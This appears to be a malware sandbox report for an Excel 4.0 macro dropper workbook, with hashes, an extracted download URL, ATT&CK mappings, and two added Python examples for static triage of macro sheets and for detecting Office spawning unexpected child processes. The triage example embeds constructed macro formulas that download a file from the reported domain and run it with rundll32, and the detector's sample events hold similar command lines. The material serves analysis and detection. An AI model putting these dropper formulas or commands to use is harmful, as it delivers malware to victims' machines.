General

  • Target

    file (14).zip

  • Size

    42KB

  • Sample

    210315-53bvxlw2lx

  • MD5

    f4d370880021baf70dfde2a91ade3bae

  • SHA1

    5394f14c29085e65a53227da3e8657459f3923ed

  • SHA256

    efa9ede0e366d39c3789b95fc0b4acf0577b33a72fc05bbe376b88c9a9feea09

  • SHA512

    1b4398751c565ed57b954fbf7af273bcdc1a97c641cfb9e9432fa48a1d0f9970b095510ce787fe668efed2ca6f17503b26ed55593b788e7b3a93e0e2d40d74a7

Score
10/10

Malware Config

Extracted

  • Language

    xlm4.0

  • Source

    xlm40.dropper

  • URLs

    http://vpu03jivmm03qncgx.com/index.gif
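The extracted config above comes from an Excel 4.0 (XLM) macro sheet inside the .xlsm. An OOXML workbook is a zip: XLM sheets live under xl/macrosheets/, are usually marked hidden or veryHidden in xl/workbook.xml, and are wired to run at open time through an Auto_Open defined name. The script below is an added example, not Tria.ge's xlm40.dropper extractor and not code from the report: it builds a constructed in-memory workbook shaped like that (only the download URL is taken from the report; the sheet names, cell formulas, and the local path and rundll32 invocation are assumed for illustration), then statically triages any workbook bytes for macro sheets, hidden sheets, Auto_Open names, embedded URLs and risky XLM calls.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Constructed sample: a minimal XLSM-shaped zip holding one very-hidden
# Excel 4.0 macro sheet. Only the download URL comes from the report; the
# sheet layout, cell formulas and local paths are assumed for illustration.
MALICIOUS_WORKBOOK_XML = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"
          xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <sheets>
    <sheet name="Sheet1" sheetId="1" r:id="rId1"/>
    <sheet name="Macro1" sheetId="2" state="veryHidden" r:id="rId2"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm.Auto_Open">Macro1!$A$1</definedName>
  </definedNames>
</workbook>"""

BENIGN_WORKBOOK_XML = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <sheets><sheet name="Sheet1" sheetId="1"/></sheets>
</workbook>"""

MACROSHEET_XML = r"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"
               xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
  <sheetData>
    <row r="1"><c r="A1" t="str"><f>CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://vpu03jivmm03qncgx.com/index.gif","C:\Users\Public\index.gif",0,0)</f></c></row>
    <row r="2"><c r="A2" t="str"><f>EXEC("rundll32 C:\Users\Public\index.gif,DllRegisterServer")</f></c></row>
    <row r="3"><c r="A3"><f>HALT()</f></c></row>
  </sheetData>
</xm:macrosheet>"""


def build_sample_xlsm(malicious: bool = True) -> bytes:
    """Write the constructed workbook parts into an in-memory OOXML zip."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("xl/worksheets/sheet1.xml", "<worksheet/>")
        if malicious:
            z.writestr("xl/workbook.xml", MALICIOUS_WORKBOOK_XML)
            z.writestr("xl/macrosheets/sheet1.xml", MACROSHEET_XML)
        else:
            z.writestr("xl/workbook.xml", BENIGN_WORKBOOK_XML)
    return buf.getvalue()


# XLM functions that let a macro sheet download, write to disk or execute.
SUSPICIOUS_FUNCS = ("CALL", "EXEC", "REGISTER", "FOPEN", "FWRITE", "FORMULA", "RUN")
URL_RE = re.compile(r"""https?://[^\s"'<>)]+""")


def _local(tag: str) -> str:
    """Strip the XML namespace so tags can be compared by local name."""
    return tag.rsplit("}", 1)[-1]


def triage_xlsm(data: bytes) -> dict:
    """Static triage: macro sheets, hidden sheets, Auto_Open names, URLs, risky calls."""
    report = {"macrosheets": [], "hidden_sheets": [], "auto_open": [],
              "urls": set(), "suspicious_calls": set()}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        # Any part under xl/macrosheets/ is an Excel 4.0 macro sheet.
        report["macrosheets"] = sorted(n for n in names if n.startswith("xl/macrosheets/"))
        if "xl/workbook.xml" in names:
            for el in ET.fromstring(z.read("xl/workbook.xml")).iter():
                tag = _local(el.tag)
                if tag == "sheet" and el.get("state") in ("hidden", "veryHidden"):
                    report["hidden_sheets"].append((el.get("name"), el.get("state")))
                elif tag == "definedName" and "auto_open" in (el.get("name") or "").lower():
                    report["auto_open"].append((el.get("name"), (el.text or "").strip()))
        # Formulas (<f>) and cached values (<v>) are where the XLM code sits.
        for n in report["macrosheets"]:
            for el in ET.fromstring(z.read(n)).iter():
                if _local(el.tag) in ("f", "v") and el.text:
                    report["urls"].update(URL_RE.findall(el.text))
                    for fn in SUSPICIOUS_FUNCS:
                        if re.search(r"\b%s\s*\(" % fn, el.text):
                            report["suspicious_calls"].add(fn)
    report["urls"] = sorted(report["urls"])
    report["suspicious_calls"] = sorted(report["suspicious_calls"])
    report["verdict"] = ("xlm_dropper" if report["macrosheets"] and report["urls"]
                         and report["suspicious_calls"] else "no_xlm_dropper")
    return report


if __name__ == "__main__":
    import json
    print(json.dumps(triage_xlsm(build_sample_xlsm()), indent=2))
```

The triage deliberately never evaluates the formulas: it only inspects the zip members and XML, so it is safe to run over a suspect file on an analyst workstation. Real samples often split the URL across many cells and rebuild it with CHAR() and concatenation, so a missing URL is not a clean result; the presence of macro sheets plus CALL/EXEC/REGISTER is the stronger signal.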

Targets

    • Target

      Documents345.xlsm

    • Size

      57KB

    • MD5

      8c9041813c83038de85079aa49f3d936

    • SHA1

      6fa687e4396b933d0b4555455b55de5b8db3baf7

    • SHA256

      c5444c7252d6e22f4a2de2168a4afeb08e1f841aeba675e6e632e2c64fcd71ca

    • SHA512

      9cf1431762f932a3bf4fd858496e4339443115676084b7b6d1f0ab206940277a3cba09c410e02232e1689dc50501286888de4ed62abc3f12ce6077bcb335b309

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.
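The signature above fires on the process tree rather than on the document, which is why it survives obfuscation of the macro itself: an Office application has a small, predictable set of legitimate children, so anything else is worth an alert. The detector below is an added example of that logic, not Tria.ge's signature or code from the report. It runs over constructed Sysmon-style process-creation records (the EXCEL.EXE child spawning rundll32.exe on the dropped file, the timestamps, user path and the WINWORD.EXE line are all assumed for illustration) and raises an alert for every Office parent whose child is outside an assumed allowlist, rating it higher when the child is a signed binary droppers commonly abuse.

```python
# Constructed Sysmon-style process-creation records (EventID 1), one per line,
# key=value fields separated by "|". They are not from the report: paths,
# timestamps and command lines are assumed for illustration only.
SAMPLE_EVENTS = r"""EventID=1|UtcTime=2021-03-15 09:11:58|ParentImage=C:\Windows\explorer.exe|Image=C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE|CommandLine="EXCEL.EXE" C:\Users\victim\Downloads\Documents345.xlsm
EventID=1|UtcTime=2021-03-15 09:12:01|ParentImage=C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE|Image=C:\Windows\SysWOW64\rundll32.exe|CommandLine=rundll32 C:\Users\Public\index.gif,DllRegisterServer
EventID=3|UtcTime=2021-03-15 09:12:02|Image=C:\Windows\SysWOW64\rundll32.exe|DestinationHostname=vpu03jivmm03qncgx.com
EventID=1|UtcTime=2021-03-15 09:12:03|ParentImage=C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE|Image=C:\Windows\splwow64.exe|CommandLine=C:\Windows\splwow64.exe 12288
EventID=1|UtcTime=2021-03-15 09:20:41|ParentImage=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|Image=C:\Windows\System32\cmd.exe|CommandLine=cmd /c whoami"""

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
# Children Office spawns legitimately (print spooler proxy, crash reporting).
# Assumed baseline; tune it against your own estate before deploying.
EXPECTED_CHILDREN = {"splwow64.exe", "dw20.exe", "dwwin.exe", "werfault.exe"}
# Signed Windows binaries that macro droppers commonly use to run the next stage.
HIGH_RISK_CHILDREN = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "wscript.exe",
                      "cscript.exe", "powershell.exe", "cmd.exe", "certutil.exe",
                      "msiexec.exe"}


def parse_event(line: str) -> dict:
    """Split one 'k=v|k=v' record into a dict; values may contain '='."""
    return dict(field.split("=", 1) for field in line.split("|"))


def image_name(path: str) -> str:
    """Case-insensitive file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect_unexpected_children(lines, expected=EXPECTED_CHILDREN) -> list:
    """Alert on every Office parent whose child is not on the expected list."""
    alerts = []
    for line in lines:
        if not line.strip():
            continue
        ev = parse_event(line)
        if ev.get("EventID") != "1":          # only process-creation events
            continue
        parent = image_name(ev["ParentImage"])
        child = image_name(ev["Image"])
        if parent not in OFFICE_PARENTS or child in expected:
            continue
        alerts.append({
            "time": ev["UtcTime"],
            "parent": parent,
            "child": child,
            "severity": "high" if child in HIGH_RISK_CHILDREN else "medium",
            "cmdline": ev.get("CommandLine", ""),
        })
    return alerts


if __name__ == "__main__":
    for a in detect_unexpected_children(SAMPLE_EVENTS.splitlines()):
        print(f"[{a['severity']}] {a['time']} {a['parent']} -> {a['child']}: {a['cmdline']}")
```

Matching on the parent's image name rather than the full path keeps the rule robust across Office install locations, at the cost of being fooled by a renamed binary; pairing it with the image's signer or original file name from the same event closes that gap. The explorer.exe to EXCEL.EXE record is ignored because only Office parents are in scope, and the network event (EventID 3) is skipped by the event-type filter even though it carries the reported domain.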

MITRE ATT&CK Matrix ATT&CK v6

  • Defense Evasion

    Modify Registry (T1112): 1

  • Discovery

    Query Registry (T1012): 2

    System Information Discovery (T1082): 2

Tasks